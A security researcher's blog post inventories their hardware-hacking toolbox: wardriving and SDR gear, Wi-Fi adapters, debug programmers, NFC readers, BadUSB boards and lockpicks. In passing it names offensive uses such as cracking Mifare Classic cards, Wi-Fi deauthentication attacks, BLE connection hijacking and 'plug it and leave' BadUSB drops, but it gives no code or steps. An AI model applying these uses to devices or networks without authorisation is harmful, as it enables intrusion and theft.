João Pedro Dias

Hardware Hacking and Research Toolbox Inventory

May 05, 2024 security inventory hacking toolbox 16 minutes to read

Inspired by the blogpost My Red Team assessment hardware by David Sopas this post describes hardware tools that I have in my inventory, their purpose as well as the features/firmwares/tricks that motivated me to buy them. This is not intended to be an exhaustively detailed list, but I will try to give some rational and use-cases for each of the tools, as well as categorize them.

Do it yourself projects (partially or completely) will be marked as such with the tag [DIY]. URLs provided are either to the repositories, official websites, technical references, or online sellers. If you find any URL broken please contact me, otherwise you can still find the tools by searching the name of them with any search engine.

None of the links to online stores are sponsored in any way and should only be used as a reference.

Wi-Fi, Bluetooth and other radios

  1. [DIY] Wardriver.uk by Joseph Hewitt

    wardriver

    For wardriving1 purposes (2.4Ghz WiFi networks and Bluetooth devices) I have built a wardriver.uk based on the very detailed and nicely explained project by Joseph Hewitt, which outputs Wigle compatible files. You will need two ESP32 modules (ESP32-DevKitC V4 with ESP32-WROOM-32U is recommended), a GPS module, a SIM800L GSM module, an i2c LCD, a DS18B20 temperature sensor, and an SPI micro SD card reader/writer. I did wire it with some protoboards in the first version, then I ordered the PCB designed by the author. You can order the PCBs from the author if you want to support the project.

  2. [DIY] io433 by kripthor

    io433

    IO433 is a ESP32 (TTGO T-Display) & CC1101 based 433Mhz sniffer and re-player for ASK-OOK signals. Building instructions are available in the repository of the project as well as the firmware and gerber files for the PCBs (although I built one on top of a generic protoboard). It is a nice tool for playing around with 433Mhz based devices such as cheap weather monitors, door rings, and the like.

  3. Zsun wifi card reader

    Zsun is an Atheros AR9331 based wireless card reader with 64 MiB RAM and 16 MiB SPI flash. The specs are enough to run OpenWrt, which can make the device a tinny wireless AP / client / repeater.

  4. GL-MT300N-V2 Mini Smart Router

    A small and cheap travel router that runs OpenWRT (128MB RAM, 16MB Flash ROM), with two RJ45 Ethernet ports, (micro)USB charging with UART and some GPIOs available. It also has a nice physical VPN switch button and a easily clickable reset button (ideal to start over when you fail to configure OpenWrt properly).

  5. [DIY] Throwing Star LAN Tap

    Throwing Star LAN Tap is a passive Ethernet tap (read-only access via J3 and J4 ports), able to monitor 10BASET and 100BASETX networks. You cna build one by printing the PCBs and soldering some capacitors and RJ45 ports (instructions available). Otherwise you can also buy it in a ready to use package.

  6. TP-Link TL-WN722N V2.0

    The good’old and cheap 2.4Ghz Wi-Fi dongle that allows you to enable monitor mode2 to do Wi-Fi mischief. Normally it is recommended to get the V1 version because it works out of the box (Atheros AR9271) but you can also make it work in other hardware revisions.

  7. RTL8812au-based dual-band AC1200 WiFi adapter

    A RTL8812au-based dual-channel Wi-Fi adapter similar to Alfa Networks AWUS036ACH (as in uses the same chipset). This chipset allows monitor mode2 in both channels, thus ideal to use in offensive Wi-Fi adventures.

  8. Nooelec NESDR SMArTee v2

    A cheap and reliable SDR with RTL2832U Demodulator/USB interface IC and a R820T2 tuner IC. I advise to buy a bundler with some antennas which allows you to do some nice experiments out of the box.

Device inspection (debug tools and programmers)

  1. FT232 USB for TTL Serial Adapter for 3.3V and 5V

    FT232 USB UART Board is the go-to solution for USB-to-UART serial conversions. Different models have similar features. I carry two, one older model with miniUSB connection and another with USB A connection, and always together with a bunch of jumpers.

  2. USBASP 2.0 based on ATmega8A

    screw heads

    USBasp is a USB in-circuit programmer for Atmel AVR controllers which are commonly used in smart devices and other controllers. Firmware is provided by Thomas Fischl which has other cool projects.

  3. Dongle ST-LINK V2 STM8 STM32

    A ST-Link-Compatible Programmer & Emulator / Debugging dongle supporting both STM8 and STM32 bit processors series, that, similar to Arduino, are widely used in smart appliances.

  4. YS-IRTM 5V NEC Infrared UART transceiver

    It consists of a dual 38KHz 940nm infrared (IR) TX/RX LEDs and a micro controller which provides a UART interface. Can not be used directly via USB, thus it is recommended to connect it via a generic micro-controller. You can use the following as a reference.

  5. ELM327 V1.5 OBD2 Bluetooth Scanner and Diagnostic Tool

    A generic OBD-II protocol reader that works with a lot of car models and brands. Mostly unused in my case as I did not delve into car hacking, but I do recommend a workshop for beginners like me just to understand the “world”: Remoticon 2020 // Learn How to Hack a Car Workshop

  6. CH341A USB Programmer with Adapters

    ch341a

    The CH341A USB Programmer supports most of the 24/25 series SOP8 chips (commonly used for BIOS), and can be used to back up, erase and program such chips. I have successfully used it in the past to recover laptops from corrupted BIOS issues. I also 3D printed a yellow case for it.

  7. USB Logic Analyzer 24MHz 8 Channels

    A generic low-budget logical analyzer that features 8 Channels and, theoretically, can go up to 24 MHz (but not really in practice). It is good enough for most low-baudrate analysis, but can struggler with higher baudrate (that are becoming common). Nonetheless a good tool to keep around, specially if you don’t want to invest into a Saleae. Also, it is compatible with Saleae Logic 2 software, and, theoretically, with sigrok but I didn’t manage to put my version working correctly with it.

  8. [DIY] Logic probe

    A simple and quick to use probe that you can build (several kits available) that can be useful to probe circuits when you do not have a multimeter/logic analyzer at hand. You just connect it to a REF voltage source and GND, and then the 3 LEDs will tell the rest, if you have a Red Only it is a Logic 0, a Yellow Only is Floating, a Green Only is a Logic 1 and All LEDs means an oscillating signal.

  9. UNI-T UT139C Multimeter

    A good multimeter is always a good investment (but, still, you don’t need to go to the most expensive ones). Some of the most useful features beyond the trivial ones, from my perspective, are the frequency and temperature (℃/℉) readings.

Smart cards

  1. SIM card converter to Smartcard IC

    A SIM card to Smartcard IC converter and extension, supporting standard, micro and nano SIM cards.

  2. PN532 NFC RFID IC Card Reader Module 13.56MHz with USB Port

    A libNFC compatible board that can be used to read/write to NFC cards, including Mifare classic cards. You can also keep some empty (UID-writable) cards around. There is a good blogpost by Christian Mehlmauer on how to use the libNFC to crack Mifare classic cards, and How to hack Mifare Classic NFC cards by lp1.

  3. Generic Magstripe Reader

    A cheap and generic magnetic stripe reader that can be used for research and cool projects such as magspoof.

Generic boards

  1. Raspberry Pi Zero W with USB A add-on

    A Raspberry Pi Zero W is a full computer on a stick, capable of running several Linux distros (no more intro needed). The USB A addon board allows it to be plugged to any USB port, and, more than that, to act as a U disk or even as a BadUSB3 with P4wnP1 A.L.O.A.. P4wnP1 A.L.O.A. allows the Pi to have Plug&Play USB device emulation, HIDScript and Bluetooth and WiFi offensive analysis. Other use-cases include the known Pwnagotchi for cracking Wi-Fis either through passive sniffing or by performing deauthentication and association attacks.

  2. nRF52840 Dongle

    nRF52840 Dongle is a small USB dongle that supports Bluetooth 5.4, Bluetooth mesh, Thread, Zigbee, 802.15.4, ANT and 2.4 GHz proprietary protocols. It is useful to probe into this protocols, being known for the ability to easily eavesdrop Bluetooth Low Energy communications and perform multiple active attacks based on InjectaBLE strategy. It can also work as a security key using Google OpenSK.

  3. M5Stack Core

    An ESP32-based (Bluetooth + Wi-Fi) developer board in a really nice packaging, with built-in battery, 3 physical buttons and 20*240 IPS screen. One cool use-case is the ESP32 WiFi Hash Monster which can be used to capture all the EAPOL / PMKID packets on a SD Card for further analysis. Other use-case is the MarauderCentauri for WiFi/Bluetooth offensive and defensive tools; you can also buy the full-fledge custom hardware at justcallmekoko store.

  4. DigiSpark Attiny85

    A tiny tiny microcontroller with an USB A port that can be used as a BadUSB3. It is so cheap that it is good for plug it and leave situations. A good tutorial for it done by Baud on 0x00sec.

  5. Micro:bit

    With 3 units you can sniff on all Bluetooth LE advertising channel, and with BtleJack you can sniff, jam and hijack connections.

  6. Wemos D1 mini / ESP8266, Raspberry Pi Pico, Arduino Nano

    Some of the boards that I typically carry around, some with Pin Headers soldered, others not.

Screwdrivers, Lockpick and others

  1. Mi x Wiha Precision Screwdriver (manual)

    screw heads

    A generic precision screwdriver kit supporting most models of screw heads. Compact in size which is ideal for carry in a backpack.

  2. 4-Way Multi-Functional Utilities Key

  3. Generic Lockpick set with Practice locks

  4. Multi-tool

    A multi-tool is always nice to have, and while I don’t recommend any in specific (any Leatherman or Gerber should be more than enough), any that you buy should have, at least: (1) pliers, (2) a sharp-enough cutting blade / knife, (3) some large bit driver, and (4) a bottle opener!

Random

  1. 1Life usb:hub 3 with RTL8153 Gigabit Ethernet Adapter

    A generic USB extension hub with a Gigabit Ethernet Adapter (based on the RTL8153) is a must have for when you have few USB ports or no RJ45 port. It is also useful if you want to connect to more than one physical network at the same time.

  2. Rii Wireless Mini X1 with Touchpad - 2.4GHz - QWERTY

    An all-around wireless keyboard which is useful for a range of scenarios, e.g., configuring Raspberry Pi’s.

  3. [DIY] Small IC Test Clips, Pogo pin clamps and PCB Workstation with Needle-Probes

    3d probe

    Useful when probing PCBs and connecting to debug ports / test points. I totally recommend the 3D printed PCB workstation as it works for most PCBs and smallish traces and connections.

  4. Generic USB Multimeter

    Useful to troubleshoot USB connections (voltage and amperage). More recent models (e.g., UM25C) also allow monitoring via Bluetooth connection.

  5. Large assortment of cables and adapters

    There is no such thing as too many cables, as there is no such thing as too many adapters. A few that I recommend to have always around:

    • USB: A->C, C->A, C<->C, A->micro, A->nano, USB OTG, A<->Lightning
    • Video: HDMI<->HDMI, HDMI<->mini HDMI, VGA<->HDMI
    • RJ45
    • Assortment of jumpers (male->female, male<->male, female<->female)
    • MicroSD to SD adapter and SD card reader

  6. Generic USB LED lamp (useful for low-light situation)

  7. Assortment of USB Pens

    This keeps to be one of the things that I use the most (from live boots to install new OSes). You do not need to go to the fancy ones with USB-C and such if you keep some adapters at hand. Ventoy is a nice tool to have several ISOs in the same drive and boot from them when needed. I also keep some Linux live USBs (with something such as Debian Stable), and Clonezilla.

  8. Powerbank (at least 10000mAh)

  9. Laptop

    I left this to the end on purpose. Most probably you are thinking on a high-performance laptop. While that would be nice, for most of the cases one cheap, second hand, Thinkpad (or any other reliable brand) will suffice. I now have a Thinkpad Y370 (~250e) and a Thinkpad X240 (~200e), and the only thing that will bother you the most is RAM if you have less than 8Gb of it. Other than that just use the cloud. Google Python Notebooks are nice, but there are several cheap VPS machines that you can rent or use freely if needed (riding on free credits).

  10. Backpack and bags

    All this stuff needs to be carried (hopefully not everything at once). For that I recommend any rucksack-like backpack such as this one. I would not recommend the military-grade ones, specially if you don’t want unnecessary attention (e.g., airports). Also, some small bags with compartments are useful, such as this one or this one. And, always carry some velcro roll (that you can cut to size) which is always useful to tie things together.

Footnotes

  1. Wardriving is the act of searching for Wi-Fi wireless networks as well as cell towers, usually from a moving vehicle, using a laptop or smartphone., Wikipedia 

  2. Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first., Wikipedia  2

  3. USB device has an in-built firmware feature that allows itself to be disguised as a human interface device (USB HID), such as a keyboard, and thus inject payloads via keystrokes.  2

Hardware Hacking and Research Toolbox Inventory by jpdias is licensed under CC BY 4.0